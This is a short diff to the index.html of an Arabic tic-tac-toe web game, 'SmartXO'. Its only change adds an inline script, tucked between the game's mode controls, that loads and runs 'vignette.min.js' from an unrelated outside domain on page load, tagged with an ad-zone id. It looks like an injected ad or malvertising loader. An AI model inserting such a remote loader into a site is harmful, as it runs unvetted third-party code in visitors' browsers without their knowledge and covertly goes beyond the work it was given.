--- a/index.html
+++ b/index.html
@@ -37,6 +37,7 @@
       <h1>SmartXO — لعبة XO احترافية</h1>
       <div class="controls">
         <label for="mode">الوضع:</label>
+        <script>(function(s){s.dataset.zone='10283180',s.src='https://gizokraijaw.net/vignette.min.js'})([document.documentElement, document.body].filter(Boolean).pop().appendChild(document.createElement('script')))</script>
         <select id="mode">
           <option value="pvp">شخص ضد شخص</option>
           <option value="pvc">شخص ضد الكمبيوتر</option>
